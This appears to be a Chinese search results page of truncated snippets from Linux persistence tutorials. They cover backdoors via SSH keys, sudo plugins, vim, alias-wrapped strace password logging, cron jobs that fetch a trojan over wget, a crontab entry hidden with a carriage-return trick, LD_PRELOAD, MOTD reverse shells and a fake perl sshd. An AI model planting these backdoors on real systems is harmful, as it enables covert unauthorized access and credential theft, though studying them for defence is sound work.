首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

linux安装ssh服务

在 Ubuntu 中安装 openssh 实在是再简单不过的一件事情了,只需通过apt-get安装openssh-server即可。   ...事实上如果没什么特别需求,到这里 OpenSSH Server 就算安装好了。但是进一步设置一下,可以让 OpenSSH 登录时间更短,并且更加安全。...sudo sed -i ‘s@^#\(GSSAPIDelegateCredentials no\)@\1@g’ /etc/ssh/sshd_config   然后重新启动 ssh 服务即可:   sudo.../etc/init.d/ssh restart   再登录试试,应该非常快了吧   通过证书认证登录服务器SSH 服务中,所有的内容都是加密传输的,安全性基本有保证。...在~/.ssh目录下ssh-keygen 命令会生成两个密钥,通过一下命令把私钥拷到客户端即可:   ssh-copy-id [-i [identity_file]] [user@]machiner

7.4K60

渗透测试|Linux下的ssh免密登录后门

hitokoto.innerText = data.hitokoto; } } xhr.send(); 前言 相信大家在做渗透测试的时候,会遇到后渗透阶段的权限维持问题,常见的linux...后门有crontab后门(在计划任务里添加反弹shell任务),超级用户后门(也就是uid=0的用户),ssh免密登录后门等等等~~~[aru_5],当然你有能力的话,可以试试破解root密码~~这里我就详细的教大家如何利用...ssh后门和计划任务后门(下次讲,这次懒得写了~)进行权限维持。...ssh免密登录后门 ssh免密登录就是在自己的攻击机上生成一个密钥,然后把他放进目标主机的ssh密钥存放文件里(个人理解~),然后攻击机就可以拿着这个密钥直接连接目标主机了,不需要密码,当然后门嘛,...chmod 700 ~/.ssh 详细操作可看下图: 4.在攻击机上使用免密登录测试 ssh -i /root/.ssh/id_rsa root@目标ip 测试截图如下: 可以看到不用密码就直接进入了目标服务器

2K20

Vim 后门 | Linux 后门系列

背景颜色来判断最终结果 默认背景颜色为 dark 系统配置背景颜色为 dark 用户配置背景颜色为白色 现在打开 1.txt 查看背景颜色 配置最终以用户配置为准,但是似乎背景颜色没有改成白色,难道是 ssh...环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本.../configure 可能会提示缺少依赖包,可以通过 sudo apt install 来进行安装,这里记录本次编译需要的安装的依赖 sudo apt install libncurses-dev...+packages:启用插件包管理器功能,可以方便地安装和管理插件。 +path_extra:启用额外的路径支持。

53051

sudo 后门Linux 后门系列

sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...create_unverified_context());exec(r.read());" 3) 编译 sudoers.so 本地找一台与目标环境相同的测试主机进行编译,我这里直接使用目标主机,编辑好后取出 sudoers.so ,之后还原为刚安装完的状态...getting/source/ 注入 payload 进 sudoers.so 源代码 根据分析,我们在 sudoers_init 函数中插入 payload 注意转义双引号以及代码最后的分号 安装编译需要的依赖...在解压缩后的目录中执行 4) 测试无误后拷贝sudoers.so 至被害主机 生成的 sudoers.so 位于 plugins/sudoers/.libs/sudoers.so 测试无误后将其保存,将主机恢复至刚安装

27710

alias后门 | Linux 后门系列

也不是通过 dpkg 安装的,那么只能上大招了 ? 可有发现有两个名字为 alias 的文件 ? 这个文件似乎不是alias 的配置文件,看下一个 ?...也是存在的,所以这些都是"藏污纳垢"的好地方 0x03 alias 后门分析&制作 当前用户目录下.bashrc alias ssh='strace -o /tmp/sshpwd-`date '+%d...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...只是做了一个小技巧,而不是主要的后门命令,含义也就是将当前用户的ssh命令修改为 strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门

7.4K30

渗透基础-SSH后门分析总结

对于UNIX系统来说,ssh服务端作为最广泛应用的远程管理服务并且有一定对外开放的必然性,必然引起黑客关注,所以ssh类的后门也是unix下最经典的后门方式之一了。...目前,所谓openssh,Dropbear SSH等,都是ssh协议的工具体现 所谓后门是在渗透完成之后的阶段,攻击者获取到一台服务器的root权限后,需要通过后门长期能够控制这台服务器...爆发时间:2007年就存在,2014年卷土重来 SSh后门: 该恶意软件绑定了一个Dropbear SSH后门后门程序如下: Set WshShell = CreateObject(“WScript.Shell...思考:这一类的后门原理上都是通过提供的第三方库再实现一个简易的ssh客户端和服务端,然后将服务端安装在受害者机器上,实现连接、 与之类似的有如下工具: https://github.com/joridos.../custom-ssh-backdoor,该工具是通过python的paramiko库自己实现了个ssh功能的软件,然后安装在服务端上 比较缺乏的是,github上大部分的后门软件都只是实现了ssh的功能

3K40

计划任务后门 | Linux 后门系列

Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!).../etc/cron.d/popularity-contest 这个文件也是用来执行一项计划任务,计划任务的主要效果是统计出那些是最流行的安装包 参考文章 https://manpages.debian.org...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab

6.4K50

修改后门ctime | Linux 后门系列

0x00 前情提要 在 alias 后门Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update

5.5K20

LD_PRELOAD 后门 | Linux 后门系列

加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!...和 pwd 命令,此时,两个都可以执行 payload ltrace 追踪 ssh、id 等命令的时候不会触发 payload 问了一圈人,也没人知道咋回事,到现在我也不知道具体因为什么,如果哪位兄弟知道

7.2K20

MOTD 后门引发的思考 | Linux 后门系列

,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的 参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples...脚本本身就有好多代码,如果在其中插入一些隐蔽的指令或者干脆使用上面探究的 source 的方法,其实是很难发现的 插入指令后登录功能卡住 有些场景下,插入我们的指令后出现登录卡住的问题,当然反弹shell 没有问题,ssh

7.3K00

一款短小精致的SSH后门分析

引言 在《利用系统特性伪装成一个免密登陆后门》一文中,我介绍过利用系统特性伪装成一个ssh系统后门,不过,这个后门需要新开一个端口,而本文介绍的这个后门只需要系统上开放了ssh服务就行了,不需要额外的开放端口...后门简介 这个ssh 后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd , 将系统原先的sshd 移到/usr/bin下 sshd后门源码: #!...)的参数都传递给真正的sshd (这一行保证了普通用户也可以正常使用ssh 服务,登录并不会有什么异常现象) 补充: 在网络通信当中,大多传递的数据是以二进制流(binary data)存在的。...chmod +x /usr/sbin/sshd 重启 ssh 服务 ?...22 端口是sh 和 控制端连接,程序名是ssh ,而不是正常的sshd 为了增强隐秘性, 我们可以将copy 一份/bin/sh, 重命名为/bin/sshd,修改后门源码为: #!

2.5K40
领券